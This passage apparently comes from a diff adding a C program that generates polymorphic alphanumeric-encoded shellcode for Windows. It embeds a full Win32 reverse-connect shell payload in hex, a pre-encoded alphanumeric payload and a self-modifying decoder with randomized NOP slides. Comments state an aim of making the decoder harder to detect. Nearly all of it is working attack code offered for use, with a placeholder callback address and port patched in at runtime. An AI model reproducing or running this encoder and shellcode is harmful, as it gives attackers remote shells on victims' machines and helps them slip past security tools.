memchr(p_state[4], 1, 11-(p_state[3]-random_states)); - if(p_state[4]) - p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); - } - } - - } - while (!p_state[4]); - - for (c=state=0; state. + + +-----------+ + WORKS CITED + +-----------+ + +--------------------------------------------------------------------------------------------------+ + |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | + |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | + |Full-Disclosure | + | | + |CLET Team. Aug. 2003 | + |Polymorphic Shellcode Engine | + |Phrack | + | | + |Ionescu, Costin. 1 July 2003 | + |Re: GetPC code (was: Shellcode from ASCII) | + |Vuln-Dev | + | | + |rix. Aug. 2001 | + |Writing ia32 alphanumeric shellcodes | + |Phrack | + | | + |Wever, Berend-Jan. 28 Jan. 2001 | + |Alphanumeric GetPC code | + |Vuln-Dev | + |ALPHA3 | + +--------------------------------------------------------------------------------------------------+ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +*/ +#include +#include +#include + +#define MAX_BYTES 0x100 +#define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack +#define MIN_IP_STR_LEN 7 +#define MAX_IP_STR_LEN 15 + +#define OFFSET_XOR_AL1_A 15 +#define OFFSET_XOR_AL1_B 18 +#define OFFSET_XOR_AL2_A 37 +#define OFFSET_XOR_AL2_B 40 +#define OFFSET_PUSH_DWORD1 0 +#define OFFSET_PUSH_DWORD2 1 +#define OFFSET_PUSH_DWORD3 4 +#define OFFSET_PUSH_DWORD4 12 +#define OFFSET_RANDOMIZED_DECODER_HEAD 14 +#define SIZE_RANDOMIZED_DECODER_HEAD 16 +BYTE EncodedShellcode[] = // encoded 336 bytes + "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" + "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" + "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" + "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" + "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" + "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" + "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" + "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" + "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" + "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" + "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" + "1telLPYuGyNvX1TyJ3yLdOwckr"; + +// example: make encoder choose more uppercase bytes... +#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + +#define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset + // feel free to +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV +#define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// +#define _Q(str) #str +#define Q(str) _Q(str) +#define P(str) #str ##" // <--- buffer offset\n"## _Q(str) +/////////////////////////////////// +#define CONNECT_BACK_SHELLCODE // +//#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. + /////////////////////////////////////////////////////////////////// | +int main(); // | +UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | +UCHAR get_push_register_instruction(UCHAR *reg); // | +UCHAR get_random_alnum_value(); // | +UCHAR get_random_alnum_push_dword_opcode(); // | +UCHAR *get_nop_slide(UINT size, UINT slide); /////// | +UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | +UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | +UCHAR *shuffle(UCHAR str[], UINT length); /////// | +DWORD my_htonl(DWORD dw_in); // | +DWORD ip_str_to_dw(UCHAR *str); // | +BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | +BOOL is_alnum(UCHAR c); // | +BOOL str_is_alnum(UCHAR *str); // | +UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | +UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | +struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | +struct xor2_key *choose_random_node(struct xor2_key *head); // | +void free_p_xor2_key(struct xor2_key *node); // | + // | +struct xor2_key { // | + UCHAR xor2; // | + UCHAR key; // | + struct xor2_key *prev; // | + struct xor2_key *next; // | +} xor2_key; // | + // | + // | +// Title: Win32 Reverse Connect // | +// Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | +// Author: hdm[at]metasploit.com // | +#ifdef CONNECT_BACK_SHELLCODE // | + #define OFFSET_IP_ADDRESS 154 // | + #define OFFSET_TCP_PORT_NUMBER 159 // | + #define IP_ADDRESS "127.0.0.1" // | + #define TCP_PORT_NUMBER 123 // | + DWORD ip_address; // | + UCHAR shellcode[] = // | + "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | + "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | + "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | + "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | + "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | + "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | + "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | + "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | + "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | + "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | + "IPIP" // I.P. address // | + "\x68" // | + "PORT" // TCP port number // | + "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | + "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | + "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | + "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | + "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | + "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | + "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | + "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | + "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | + "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | + "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | +#else ////////////////////////////////////// | + UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' +#endif // +DWORD size = sizeof(shellcode)-1; // + // +int main() { ///////////////////////////////////////////////////////// + //(decoder address is in ecx when decoder starts) // + UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. +// // | +#define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | + UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | + UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | + UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | + int offset_imul_key = '\xC1';//////////////////////// | + int jne_xor1 = '\xC2';// >---------------------------------------------------------. | + int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | + // you would need to play with these two values if you want to reduce | | + // the size of the NOP slides - they obviously need to stay alnum. | | + // You could also play with the value of AL before the XOR is done | | + // to get your desired negative offset. keep in mind that it will cost | | + // you instructions to get al to the value you want (if you use xor of | | + // two alphanumeric bytes, you would need to push first alphanumeric | | + // char to the stack, pop eax, then xor it with it's alnum complement) | | + // This playing around would result in an even harder to detect decoder | | + // as the offsets would be different | | + int size_decoder ='\xC4'; // | | + int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | + UCHAR imul_instruction_1 ='\x6B'; // | | + UCHAR imul_instruction_2 ='\x41'; // | | + UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | + UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | + // // | | + UINT column=0, i=0; /////////////////////////////// | | + UCHAR *alnum = ALNUM_CHARSET; // | | + UCHAR *p_alnum = alnum; // | | + UCHAR decoder[] = // | | + { //////////////////////////////////////////////////////////////////////////////// | | + // | | + //[step_1] -- multiply first encoded byte with key | | + //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | + // | | + // Each binary byte is encoded into three alphanumeric bytes. | | + // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | + // binary byte. | | + // | | + // TODO: | | + // .--(first byte ^ second byte) * third byte | | + // '--(second byte ^ first byte) * third byte | | + // | | + // .--(first byte ^ third byte) * second byte | | + // '--(third byte ^ first byte) * second byte | | + // | | + // .--(second byte ^ third byte) * first byte | | + // '--(third byte ^ second byte) * first byte | | + // | | + // .--(first byte * second byte) ^ third byte | | + // '--(second byte * first byte) ^ third byte | | + // | | + // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | + // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | + // | | + // .--(second byte * third byte) ^ first byte | | + // '--(third byte * second byte) ^ first byte | | + // | | + // | | + // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | + // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | + // same encoder. | | + // | | + /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. + /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | + /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | + /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | + /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | + /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | + /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | + /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | + /*13*/ '\x50', //push ??? (this can change) // [edi = address of decoder]------+ | | | + /*14*/ '\x61', //popad // [set all registers] <-----------' | | | + /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | + /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | + /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | + /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | + /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | + /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | + /*26*/ '\x52', //push edx [save decoder address on stack] | | | + /*27*/ '\x52', //push edx >----. | | | + /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | + /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | + /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | + //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | + /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | + /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | + /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | + /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | + /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | + /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | + /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | + /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | + /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | + /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. | | | | | | | | + /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | + /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | + /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | + /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | + /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | + /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | + /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | + /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | + /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | + /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | + /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | + /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | + /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | + /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | + /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | + /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | + /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | + /*67*/ '\x49',// //dec ecx| |// | | | | | | + /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | + /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | + /*70*/ '\x41',// //inc edx| |// | | | | | | + /*71*/ '\x49',// //dec edx| |// | | | | | | + /*72*/ '\x41',// //inc esi| |// | | | | | | + /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | + /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | + /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | + //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | + // | | | | | | + // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | + // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | + // or the offset will not be alphanumeric. | | | | | | + // | | | | | | + // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | + // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | + // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | + // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | + // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | + // register instead. We happen to have such a register - edi =] | | | | | | + // | | | | | | + // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | + // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | + // the pop eax would overwrite it | | | | | | + // | | | | | | + // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | + // alphanumeric.). | | | | | | + // | | | | | | + // -OBSOLETE- | | | | | | + // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | + // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | + // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | + // (add the number of bytes to it) | | | | | | + // If you wish to move it down, you will need to move it down by an even number of | | | | | | + // bytes. | | | | | | + // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | + // (deduct the number of bytes from it) | | | | | | + // | | | | | | + // TODO: make a routine that moves it around randomally between allowed values | | | | | | + // and sets the proper offsets | | | | | | + // this routine should be called after the NOP slides have been randomized. | | | | | | + // | | | | | | + ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | + /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | + /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | + /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | + /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | + /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | + /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | + /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | + /*83*/ '\x49',// //dec esi| |// | | | | | | + /*84*/ '\x41',// //push eax| |// | | | | | | + /*85*/ '\x49',// //pop eax| |// | | | | | | + /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | + /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | + // IMUL can go down to here | | | | | | + ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | + /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | + ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | + /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. | | | | + /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | + /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | + /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | + /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | + /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | + /*104*/ '\x45', //ebp incremented once //inc ebp | | | | + /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | + /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | + '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | + };////////////////////////////////////////////////// | | + UINT shrink; // | | + UCHAR *found_msg; // | | + UCHAR *p_decoder = decoder; // | | + UCHAR xor1, xor2, key; // | | + UCHAR temp_buf[3] = ""; // | | + UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | + UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | + struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). | | + UCHAR *p_shellcode = shellcode; // | | + void *_eip = 0; // | | + // | | + int offset_nop_slide1; // | | + int offset_nop_slide2; // | | + int offset_half_size_decoder; // | | + int offset_terminating_key; // | | + int offset_imul_instruction1; // | | + int offset_imul_instruction2; // | | + int offset_imul_instruction3; // | | + int offset_imul_instruction4; // | | + int negative_offset_size_decoder1; // | | + int negative_offset_size_decoder2; // | | + int negative_offset_size_decoder3; // | | + int offset_size_decoder_min_1; // | | + int offset_size_decoder_pls_2; // | | + int offset_imul_key_offset1; // | | + int offset_imul_key_offset2; // | | + int offset_imul_key_offset3; // | | + int offset_imul_instruction; // | | + int size_nop_slide1; // | | + int size_nop_slide2; // | | + int offset_jne_xor1; // | | + int offset_jne_xor2; // | | + int decoder_length_section1; // | | + int decoder_length_section2; // | | + int decoder_length_section3; // | | + int imul_instruction_length; // | | + int jne_xor_negative_offset; // | | + int backward_slide_offset; // | | + BOOL decoder_version_1; // | | + UINT srand_value; // | | +#ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | + printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | + found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | + if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | + else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | +#endif ////////////////// | | + printf("shellcode length:%d\n", size); // | | + srand_value = time(NULL); // | | +// srand_value = ; // for debugging | | + srand(srand_value); // | | + printf("srand value=%d\n", srand_value); // | | + decoder_version_1 = rand() % 2; // | | + ///// | | + size_decoder = strlen(decoder);// | | + decoder_length_section1 = 30; ////////////// | | + decoder_length_section2 = 29; // | | + decoder_length_section3 = 18; // | | + // | | + size_nop_slide1 = 28; // | | + size_nop_slide2 = 0; // | | + // | | + imul_instruction_length = 4; // | | + // | | + shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | + memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | + decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | + imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | + size_decoder -=shrink; /////////////////////////////////////////////////////// | | + half_size_decoder = size_decoder/2; // | | + size_nop_slide1 -=shrink; ///////////////////////// | | + printf("shrinking decoder by: %d\n", shrink); // | | + // | | + offset_imul_instruction = decoder_length_section1+// | | + decoder_length_section2+// | | + size_nop_slide1;////////// | | + // | | + backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | + strncpy(decoder, // | | + slide_substr_back(decoder, // | | + offset_imul_instruction, // | | + imul_instruction_length, // | | + size_decoder, ///// | | + backward_slide_offset), // | | + size_decoder); // | | + offset_imul_instruction -=backward_slide_offset; // | | + size_nop_slide1 -=backward_slide_offset; // | | + size_nop_slide2 +=backward_slide_offset; ////////////// | | + printf("backward_slide_offset = %d\n", backward_slide_offset);// | | + /////////////////////////////////// | | + negative_offset_size_decoder1 = 9; // | | + negative_offset_size_decoder2 = 12; // | | + negative_offset_size_decoder3 = 15; // | | + // | | + offset_half_size_decoder = 6; // | | + offset_terminating_key = 8; // | | + offset_jne_xor1 = 21; // | | + offset_size_decoder_min_1 = 24; // | | + // | | + offset_imul_key_offset1 = 14 + decoder_length_section1; // | | + offset_imul_key_offset2 = 17 + decoder_length_section1; // | | + offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | + offset_imul_key_offset3 = 24 + decoder_length_section1; // | | + // | | + offset_nop_slide1 = decoder_length_section1+ // | | + decoder_length_section2; // | | + offset_nop_slide2 = decoder_length_section1+ // | | + decoder_length_section2+ // | | + size_nop_slide1+ // | | + imul_instruction_length; // | | + // | | + offset_imul_instruction1 = offset_imul_instruction; // | | + offset_imul_instruction2 = offset_imul_instruction+1; // | | + offset_imul_instruction3 = offset_imul_instruction+2; // | | + offset_imul_instruction4 = offset_imul_instruction+3; // | | + // | | + // | | + offset_imul_key = offset_imul_instruction4; // | | + // | | + offset_jne_xor2 = size_decoder-1; // | | + jne_xor_negative_offset = decoder_length_section3+ // | | + decoder_length_section2+ // | | + size_nop_slide2+ // | | + imul_instruction_length+ // | | + size_nop_slide1; // | | + // | | + // | | + printf("size_decoder=0x%2X - %s\n", // | | + (UCHAR)size_decoder, ////// | | + is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | + // | | + printf("half_size_decoder=0x%2X - %s\n", // | | + (UCHAR)half_size_decoder, // | | + is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | + *(decoder+offset_half_size_decoder) = half_size_decoder; // | | + // | | + printf("offset_imul_key=0x%2X - %s\n", // | | + (UCHAR)offset_imul_key, // | | + is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | + *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | + *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | + *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | + // // | | + printf("size_decoder-1=0x%2X - %s\n", // | | + (UCHAR)size_decoder-1, // | | + is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | + *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | + // | | + printf("size_decoder+2=0x%2X - %s\n", // | | + (UCHAR)size_decoder+2, //////// | | + is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | + // | | + *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | + *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | + *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | + // | | + *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | + '\xFF', // | | + 0); // | | + *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | + '\xFF', // | | + 1); // | | +#ifdef CONNECT_BACK_SHELLCODE // | | + ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | + if (ip_address == -1) /////////////////////////////////////////////////// | | + exit(-1); // | | + /////////////////////////////////// | | + //set shellcode with ip address and port for connect-back // | | + ///* ////////// | | + *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | + *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | + *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | +#endif ////////////////////////////////////////// | | + //*/ // | | + //set decoder with 'random' nop slides // | | + strncpy(decoder+offset_nop_slide1, //////////////////////////// | | + shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | + size_nop_slide1); // | | + strncpy(decoder+offset_nop_slide2, // | | + shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | + size_nop_slide2); /////////////////////////////// | | + // | | + //set decoder with random initial key //////////////////////////////////////////// | | + *(decoder+offset_imul_key) = get_random_alnum_value();// | | + printf("initial key=0x%2X - %s\n", ////////////// | | + (UCHAR)*(decoder+offset_imul_key), // | | + is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | + // | | + ////////////// | | + // | | + //set decoder with 'random' dword pushes for registers we won't use //////////////// | | + *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword1=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword2=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword3=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | + *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | + printf("push dword4=0x%2X - %s\n", // | | + (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | + is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | + // | | + //bugfix: this time after srand() :) // | | + xor_al1=get_random_alnum_value(); // | | + xor_al2=get_random_alnum_value(); // | | + *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | + *(decoder+OFFSET_XOR_AL1_B) = xor_al1; 